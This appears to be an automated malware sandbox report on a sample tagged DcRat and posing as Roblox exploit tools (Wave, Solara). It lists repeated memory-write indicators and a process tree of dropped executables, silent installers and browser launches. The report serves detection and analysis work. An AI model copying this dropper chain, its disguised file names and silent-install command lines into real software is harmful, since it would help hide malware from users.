pid Process 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe 3904 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3332 wrote to memory of 944 3332 Wave.exe 78 PID 3332 wrote to memory of 944 3332 Wave.exe 78 PID 3332 wrote to memory of 944 3332 Wave.exe 78 PID 3332 wrote to memory of 3032 3332 Wave.exe 79 PID 3332 wrote to memory of 3032 3332 Wave.exe 79 PID 3332 wrote to memory of 3032 3332 Wave.exe 79 PID 3032 wrote to memory of 3684 3032 SolaraBoostrapper.exe 80 PID 3032 wrote to memory of 3684 3032 SolaraBoostrapper.exe 80 PID 3032 wrote to memory of 3684 3032 SolaraBoostrapper.exe 80 PID 3032 wrote to memory of 4428 3032 SolaraBoostrapper.exe 81 PID 3032 wrote to memory of 4428 3032 SolaraBoostrapper.exe 81 PID 3032 wrote to memory of 4428 3032 SolaraBoostrapper.exe 81 PID 3684 wrote to memory of 4208 3684 Jopasobaki.exe 82 PID 3684 wrote to memory of 4208 3684 Jopasobaki.exe 82 PID 3684 wrote to memory of 4208 3684 Jopasobaki.exe 82 PID 3684 wrote to memory of 3028 3684 Jopasobaki.exe 83 PID 3684 wrote to memory of 3028 3684 Jopasobaki.exe 83 PID 3684 wrote to memory of 3028 3684 Jopasobaki.exe 83 PID 4428 wrote to memory of 3936 4428 Solarascripts.exe 84 PID 4428 wrote to memory of 3936 4428 Solarascripts.exe 84 PID 4428 wrote to memory of 3936 4428 Solarascripts.exe 84 PID 4208 wrote to memory of 2648 4208 Result.exe 85 PID 4208 wrote to memory of 2648 4208 Result.exe 85 PID 4208 wrote to memory of 2648 4208 Result.exe 85 PID 4208 wrote to memory of 388 4208 Result.exe 87 PID 4208 wrote to memory of 388 4208 Result.exe 87 PID 4208 wrote to memory of 388 4208 Result.exe 87 PID 3028 wrote to memory of 2392 3028 Solaradrive.exe 88 PID 3028 wrote to memory of 2392 3028 Solaradrive.exe 88 PID 3028 wrote to memory of 2392 3028 Solaradrive.exe 88 PID 388 wrote to memory of 2940 388 solara.exe 89 PID 388 wrote to memory of 2940 388 solara.exe 89 PID 388 wrote to memory of 2940 388 solara.exe 89 PID 2940 wrote to memory of 2488 2940 WScript.exe 90 PID 2940 wrote to memory of 2488 2940 WScript.exe 90 PID 2940 wrote to memory of 2488 2940 WScript.exe 90 PID 2488 wrote to memory of 1244 2488 cmd.exe 92 PID 2488 wrote to memory of 1244 2488 cmd.exe 92 PID 2392 wrote to memory of 4472 2392 WScript.exe 93 PID 2392 wrote to memory of 4472 2392 WScript.exe 93 PID 2392 wrote to memory of 4472 2392 WScript.exe 93 PID 4472 wrote to memory of 2460 4472 cmd.exe 97 PID 4472 wrote to memory of 2460 4472 cmd.exe 97 PID 2648 wrote to memory of 1752 2648 SolaraBootstrapper.exe 98 PID 2648 wrote to memory of 1752 2648 SolaraBootstrapper.exe 98 PID 2648 wrote to memory of 1752 2648 SolaraBootstrapper.exe 98 PID 1244 wrote to memory of 4668 1244 browserwinsvc.exe 130 PID 1244 wrote to memory of 4668 1244 browserwinsvc.exe 130 PID 1244 wrote to memory of 1008 1244 browserwinsvc.exe 131 PID 1244 wrote to memory of 1008 1244 browserwinsvc.exe 131 PID 1244 wrote to memory of 4188 1244 browserwinsvc.exe 132 PID 1244 wrote to memory of 4188 1244 browserwinsvc.exe 132 PID 1244 wrote to memory of 4388 1244 browserwinsvc.exe 133 PID 1244 wrote to memory of 4388 1244 browserwinsvc.exe 133 PID 1244 wrote to memory of 4312 1244 browserwinsvc.exe 134 PID 1244 wrote to memory of 4312 1244 browserwinsvc.exe 134 PID 1244 wrote to memory of 2864 1244 browserwinsvc.exe 135 PID 1244 wrote to memory of 2864 1244 browserwinsvc.exe 135 PID 1244 wrote to memory of 3200 1244 browserwinsvc.exe 136 PID 1244 wrote to memory of 3200 1244 browserwinsvc.exe 136 PID 1244 wrote to memory of 5084 1244 browserwinsvc.exe 137 PID 1244 wrote to memory of 5084 1244 browserwinsvc.exe 137 PID 1244 wrote to memory of 3032 1244 browserwinsvc.exe 138 PID 1244 wrote to memory of 3032 1244 browserwinsvc.exe 138 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Wave.exe"C:\Users\Admin\AppData\Local\Temp\Wave.exe"1⤵
- DcRat
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3332 -
C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:944 -
C:\Users\Admin\AppData\Local\Wave\WaveBootstrapper.exe"C:\Users\Admin\AppData\Local\Wave\WaveBootstrapper.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:2796 -
C:\Users\Admin\AppData\Local\Wave\WaveWindows.exe"C:\Users\Admin\AppData\Local\Wave\WaveWindows.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks for any installed AV software in registry
- Drops file in Program Files directory
PID:4788 -
C:\Users\Admin\AppData\Local\CefSharp\CefSharp.BrowserSubprocess.exe"C:\Users\Admin\AppData\Local\CefSharp\CefSharp.BrowserSubprocess.exe" --type=gpu-process --no-sandbox --locales-dir-path="C:\Users\Admin\AppData\Local\CefSharp\locales" --resources-dir-path="C:\Users\Admin\AppData\Local\CefSharp" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CefSharp" --cefsharpexitsub --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2072,i,2768720679597987612,2417208657726558225,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI --variations-seed-version --enable-logging=handle --log-file=2100 --mojo-platform-channel-handle=2056 /prefetch:2 --host-process-id=47885⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1724
-
-
C:\Users\Admin\AppData\Local\Luau Language Server\node.exe"C:\Users\Admin\AppData\Local\Luau Language Server\node.exe" server --process-id=47885⤵
- Executes dropped EXE
PID:3348
-
-
C:\Users\Admin\AppData\Local\CefSharp\CefSharp.BrowserSubprocess.exe"C:\Users\Admin\AppData\Local\CefSharp\CefSharp.BrowserSubprocess.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --locales-dir-path="C:\Users\Admin\AppData\Local\CefSharp\locales" --resources-dir-path="C:\Users\Admin\AppData\Local\CefSharp" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CefSharp" --cefsharpexitsub --field-trial-handle=1972,i,2768720679597987612,2417208657726558225,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI --variations-seed-version --enable-logging=handle --log-file=2808 --mojo-platform-channel-handle=2792 /prefetch:3 --host-process-id=47885⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1176
-
-
C:\Users\Admin\AppData\Local\Bloxstrap\Bloxstrap.exe"C:\Users\Admin\AppData\Local\Bloxstrap\Bloxstrap.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
PID:3200
-
-
C:\Users\Admin\AppData\Local\CefSharp\CefSharp.BrowserSubprocess.exe"C:\Users\Admin\AppData\Local\CefSharp\CefSharp.BrowserSubprocess.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --locales-dir-path="C:\Users\Admin\AppData\Local\CefSharp\locales" --resources-dir-path="C:\Users\Admin\AppData\Local\CefSharp" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CefSharp" --cefsharpexitsub --field-trial-handle=4360,i,2768720679597987612,2417208657726558225,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI --variations-seed-version --enable-logging=handle --log-file=3884 --mojo-platform-channel-handle=4356 /prefetch:8 --host-process-id=47885⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4388
-
-
C:\Users\Admin\AppData\Local\CefSharp\CefSharp.BrowserSubprocess.exe"C:\Users\Admin\AppData\Local\CefSharp\CefSharp.BrowserSubprocess.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-sandbox --locales-dir-path="C:\Users\Admin\AppData\Local\CefSharp\locales" --resources-dir-path="C:\Users\Admin\AppData\Local\CefSharp" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CefSharp" --cefsharpexitsub --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3964,i,2768720679597987612,2417208657726558225,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI --variations-seed-version --enable-logging=handle --log-file=3968 --mojo-platform-channel-handle=2676 /prefetch:8 --host-process-id=47885⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2228
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SolaraBoostrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBoostrapper.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Users\Admin\AppData\Local\Temp\Jopasobaki.exe"C:\Users\Admin\AppData\Local\Temp\Jopasobaki.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Users\Admin\AppData\Local\Temp\Result.exe"C:\Users\Admin\AppData\Local\Temp\Result.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4208 -
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\SysWOW64\msiexec.exe"msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1752
-
-
C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe"C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" /install /quiet /norestart6⤵
- Executes dropped EXE
PID:1292 -
C:\Windows\Temp\{CF677528-A08B-406A-81A3-1B2B8C1AD61A}\.cr\vc_redist.x64.exe"C:\Windows\Temp\{CF677528-A08B-406A-81A3-1B2B8C1AD61A}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" -burn.filehandle.attached=540 -burn.filehandle.self=548 /install /quiet /norestart7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3880
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pizzaboxer/bloxstrap/releases/download/v2.5.4/Bloxstrap-v2.5.4.exe6⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4016 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffee8fc46f8,0x7ffee8fc4708,0x7ffee8fc47187⤵PID:4156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:27⤵PID:5116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:37⤵PID:2960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:87⤵PID:1416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:17⤵PID:3556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3592 /prefetch:17⤵PID:3856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 /prefetch:87⤵PID:544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 /prefetch:87⤵PID:3960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3136 /prefetch:87⤵PID:2360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:17⤵PID:4788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6032 /prefetch:87⤵PID:4480
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:17⤵PID:3820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:17⤵PID:2572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:17⤵PID:4032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6284 /prefetch:17⤵PID:4896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5516 /prefetch:27⤵PID:4812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:17⤵PID:5892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:17⤵PID:5916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:17⤵PID:6048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:17⤵PID:804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:17⤵PID:5460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5528 /prefetch:87⤵PID:3800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4012 /prefetch:87⤵
- Modifies registry class
PID:1936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6264 /prefetch:17⤵PID:5668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:17⤵PID:4936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:17⤵PID:5624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6540 /prefetch:17⤵PID:220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:17⤵PID:5328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7108 /prefetch:17⤵PID:5972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:17⤵PID:5532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7252 /prefetch:17⤵PID:5740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7464 /prefetch:17⤵PID:1828
-
-
